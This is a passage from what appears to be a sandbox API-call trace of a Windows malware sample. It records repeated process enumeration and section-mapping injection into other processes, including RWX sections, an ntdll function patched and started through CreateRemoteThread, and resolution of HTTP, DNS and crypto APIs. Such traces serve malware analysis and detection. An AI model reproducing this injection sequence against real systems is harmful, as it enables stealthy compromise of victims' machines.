CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0164.712] RtlMoveMemory (in: Destination=0x80000, Source=0x73348, Length=0x16 | out: Destination=0x80000) [0164.712] RtlMoveMemory (in: Destination=0x80016, Source=0x3a3fe8, Length=0x363 | out: Destination=0x80016) [0164.712] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0164.713] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter") returned 0xf8 [0164.713] GetLastError () returned 0x0 [0164.713] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0164.713] GetProcAddress (hModule=0x77130000, lpProcName="atan") returned 0x771abee0 [0164.713] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750, nSize=0x5, lpNumberOfBytesRead=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesRead=0x2cf72c*=0x5) returned 1 [0164.713] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf748*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf748*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0164.714] CreateRemoteThread (in: hProcess=0xec, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x771abee0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0164.715] CloseHandle (hObject=0xfc) returned 1 [0164.715] Sleep (dwMilliseconds=0x1f4) [0165.552] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0165.553] CloseHandle (hObject=0xf8) returned 1 [0165.553] CloseHandle (hObject=0xf4) returned 1 [0165.553] CloseHandle (hObject=0xf0) returned 1 [0165.553] CloseHandle (hObject=0xec) returned 1 [0165.553] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0165.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0165.554] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0165.554] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0165.554] CloseHandle (hObject=0xec) returned 1 [0165.554] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0165.554] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0165.554] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0165.554] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf74c, dwLength=0x1c | out: lpBuffer=0x2cf74c*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0165.554] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.554] VirtualQuery (in: lpAddress=0x3a3fe8, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a3000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0165.554] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0165.554] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0165.554] NtCreateSection (in: SectionHandle=0x2cf738, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf738*=0xf0) returned 0x0 [0165.555] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0xe0000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0165.559] NtCreateSection (in: SectionHandle=0x2cf734, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf734*=0xf4) returned 0x0 [0165.559] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0xf0000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0165.559] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0165.559] RtlMoveMemory (in: Destination=0x81000, Source=0x3a4758, Length=0x0 | out: Destination=0x81000) [0165.559] RtlMoveMemory (in: Destination=0x86000, Source=0x3a4758, Length=0x1a00 | out: Destination=0x86000) [0165.559] RtlMoveMemory (in: Destination=0x88000, Source=0x3a6158, Length=0x200 | out: Destination=0x88000) [0165.559] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0165.560] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0165.560] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0165.560] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0165.560] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0165.560] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0165.560] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0165.560] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0165.560] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0165.560] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0165.561] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0165.561] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0165.561] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0165.561] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0165.561] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0165.561] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0165.561] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0165.561] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0165.561] LdrProcessRelocationBlock (Address=0x87000, Count=0x2, TypeOffset=0x881ec, Delta=0xf00e0000) returned 0x881f0 [0165.561] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80000) returned 0x0 [0165.563] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0165.563] RtlMoveMemory (in: Destination=0x80000, Source=0x73348, Length=0x16 | out: Destination=0x80000) [0165.563] RtlMoveMemory (in: Destination=0x80016, Source=0x3a3fe8, Length=0x363 | out: Destination=0x80016) [0165.563] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0165.564] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter") returned 0xf8 [0165.564] GetLastError () returned 0x0 [0165.564] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0165.564] GetProcAddress (hModule=0x77130000, lpProcName="atan") returned 0x771abee0 [0165.564] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750, nSize=0x5, lpNumberOfBytesRead=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesRead=0x2cf72c*=0x5) returned 1 [0165.564] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf748*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf748*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0165.565] CreateRemoteThread (in: hProcess=0xec, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x771abee0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0165.566] CloseHandle (hObject=0xfc) returned 1 [0165.566] Sleep (dwMilliseconds=0x1f4) [0166.188] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0166.190] CloseHandle (hObject=0xf8) returned 1 [0166.190] CloseHandle (hObject=0xf4) returned 1 [0166.190] CloseHandle (hObject=0xf0) returned 1 [0166.190] CloseHandle (hObject=0xec) returned 1 [0166.190] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0166.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0166.190] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0166.190] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0166.190] CloseHandle (hObject=0xec) returned 1 [0166.191] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0166.191] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0166.191] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0166.191] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf74c, dwLength=0x1c | out: lpBuffer=0x2cf74c*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0166.191] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.191] VirtualQuery (in: lpAddress=0x3a3fe8, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a3000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0166.191] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0166.191] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0166.191] NtCreateSection (in: SectionHandle=0x2cf738, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf738*=0xf0) returned 0x0 [0166.191] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x70000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0166.196] NtCreateSection (in: SectionHandle=0x2cf734, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf734*=0xf4) returned 0x0 [0166.196] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0166.197] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0166.197] RtlMoveMemory (in: Destination=0x81000, Source=0x3a4758, Length=0x0 | out: Destination=0x81000) [0166.197] RtlMoveMemory (in: Destination=0x86000, Source=0x3a4758, Length=0x1a00 | out: Destination=0x86000) [0166.197] RtlMoveMemory (in: Destination=0x88000, Source=0x3a6158, Length=0x200 | out: Destination=0x88000) [0166.197] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0166.197] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0166.197] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0166.198] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0166.198] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0166.198] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0166.198] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0166.198] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0166.198] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0166.198] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0166.198] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0166.198] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0166.198] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0166.199] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0166.199] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0166.199] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0166.199] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0166.199] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0166.199] LdrProcessRelocationBlock (Address=0x87000, Count=0x2, TypeOffset=0x881ec, Delta=0xf0070000) returned 0x881f0 [0166.199] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80000) returned 0x0 [0166.200] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0166.200] RtlMoveMemory (in: Destination=0x80000, Source=0x73348, Length=0x16 | out: Destination=0x80000) [0166.200] RtlMoveMemory (in: Destination=0x80016, Source=0x3a3fe8, Length=0x363 | out: Destination=0x80016) [0166.200] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0166.201] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter") returned 0xf8 [0166.201] GetLastError () returned 0x0 [0166.201] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0166.201] GetProcAddress (hModule=0x77130000, lpProcName="atan") returned 0x771abee0 [0166.201] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750, nSize=0x5, lpNumberOfBytesRead=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesRead=0x2cf72c*=0x5) returned 1 [0166.201] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf748*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf748*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0166.202] CreateRemoteThread (in: hProcess=0xec, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x771abee0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0166.203] CloseHandle (hObject=0xfc) returned 1 [0166.203] Sleep (dwMilliseconds=0x1f4) [0166.835] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0166.837] CloseHandle (hObject=0xf8) returned 1 [0166.837] CloseHandle (hObject=0xf4) returned 1 [0166.837] CloseHandle (hObject=0xf0) returned 1 [0166.837] CloseHandle (hObject=0xec) returned 1 [0166.837] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0166.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0166.838] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0166.838] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0166.838] CloseHandle (hObject=0xec) returned 1 [0166.838] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0166.838] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0166.838] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0166.838] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf74c, dwLength=0x1c | out: lpBuffer=0x2cf74c*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0166.838] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.838] VirtualQuery (in: lpAddress=0x3a3fe8, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a3000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0166.838] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0166.838] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0166.838] NtCreateSection (in: SectionHandle=0x2cf738, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf738*=0xf0) returned 0x0 [0166.839] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x70000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0166.843] NtCreateSection (in: SectionHandle=0x2cf734, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf734*=0xf4) returned 0x0 [0166.843] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x170000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0166.844] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0166.844] RtlMoveMemory (in: Destination=0x81000, Source=0x3a4758, Length=0x0 | out: Destination=0x81000) [0166.844] RtlMoveMemory (in: Destination=0x86000, Source=0x3a4758, Length=0x1a00 | out: Destination=0x86000) [0166.844] RtlMoveMemory (in: Destination=0x88000, Source=0x3a6158, Length=0x200 | out: Destination=0x88000) [0166.844] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0166.844] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0166.844] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0166.845] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0166.845] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0166.845] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0166.845] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0166.845] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0166.845] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0166.845] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0166.845] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0166.845] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0166.845] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0166.846] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0166.846] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0166.846] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0166.846] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0166.846] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0166.846] LdrProcessRelocationBlock (Address=0x87000, Count=0x2, TypeOffset=0x881ec, Delta=0xf0070000) returned 0x881f0 [0166.846] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80000) returned 0x0 [0166.847] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0166.847] RtlMoveMemory (in: Destination=0x80000, Source=0x73348, Length=0x16 | out: Destination=0x80000) [0166.847] RtlMoveMemory (in: Destination=0x80016, Source=0x3a3fe8, Length=0x363 | out: Destination=0x80016) [0166.847] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0166.848] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter") returned 0xf8 [0166.848] GetLastError () returned 0x0 [0166.848] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0166.848] GetProcAddress (hModule=0x77130000, lpProcName="atan") returned 0x771abee0 [0166.848] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750, nSize=0x5, lpNumberOfBytesRead=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesRead=0x2cf72c*=0x5) returned 1 [0166.848] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf748*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf748*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0166.849] CreateRemoteThread (in: hProcess=0xec, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x771abee0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0166.850] CloseHandle (hObject=0xfc) returned 1 [0166.850] Sleep (dwMilliseconds=0x1f4) [0167.436] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0167.437] CloseHandle (hObject=0xf8) returned 1 [0167.437] CloseHandle (hObject=0xf4) returned 1 [0167.437] CloseHandle (hObject=0xf0) returned 1 [0167.437] CloseHandle (hObject=0xec) returned 1 [0167.437] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0167.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0167.438] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0167.438] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0167.438] CloseHandle (hObject=0xec) returned 1 [0167.438] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0167.438] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0167.438] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0167.438] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf74c, dwLength=0x1c | out: lpBuffer=0x2cf74c*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0167.438] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.438] VirtualQuery (in: lpAddress=0x3a3fe8, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a3000, 